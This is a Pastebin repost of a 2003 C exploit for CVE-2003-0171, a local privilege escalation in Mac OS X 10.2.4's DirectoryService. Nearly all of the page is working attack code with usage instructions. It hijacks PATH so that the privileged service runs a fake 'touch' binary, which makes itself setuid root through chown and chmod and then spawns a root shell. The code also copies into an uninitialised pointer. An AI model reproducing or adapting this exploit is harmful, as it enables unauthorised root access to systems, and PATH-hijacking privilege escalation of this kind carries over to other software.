Advertisement
FlyFar

Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Local Privilege Escalation - CVE-2003-0171

Jan 23rd, 2024
686
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.36 KB | Cybersecurity | 0 0
  1. /*
  2.    OS X <= 10.2.4 DirectoryService local root PATH exploit
  3.    DirectoryService must be crashed prior to execution, per
  4.    @stake advisory.  If you discover how to crash DirectoryService
  5.    e-mail me at neeko@haackey.com  [Neeko Oni]
  6.  
  7. --
  8. Assuming DirectoryService has been crashed/killed, compile
  9. this code as 'touch' (gcc osxds.c -o touch) and execute.
  10.  
  11. bash$ ./touch
  12. *bunch of stuff here*
  13. euid is root.
  14. bash#
  15.  
  16. */
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20. #include <unistd.h>
  21. #include <sys/types.h>
  22.  
  23. int
  24. main(int argc, char **argv)
  25. {
  26.     char           *ORIGPATH;
  27.     int             temp;
  28.     if (argc < 2) {
  29.         if (geteuid() == 0) {
  30.         printf("euid is root.\n");
  31.         setuid(0);
  32.         execl("/bin/bash", "bash", NULL);
  33.         }
  34.         strcpy(ORIGPATH, getenv("PATH"));
  35.         printf("Original path: %s\n", ORIGPATH);
  36.         setenv("PATH", ".", 1);
  37.         printf("New path: %s\n", getenv("PATH"));
  38.         printf("Executing DirectoryService with false PATH...\n");
  39.         if (fork() == 0) {
  40.             execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
  41.         }
  42.         printf("Forked DirectoryService, pausing before shell exec...\n");
  43.         sleep(3);
  44.         printf("Cross your fingers.\n");
  45.         setenv("PATH", ORIGPATH, 1);
  46.         printf("Path restored: %s\n", getenv("PATH"));
  47.         execl("./touch", "touch", NULL);       
  48.     }
  49. system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
  50. }
  51.  
  52. // milw0rm.com [2003-04-18]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement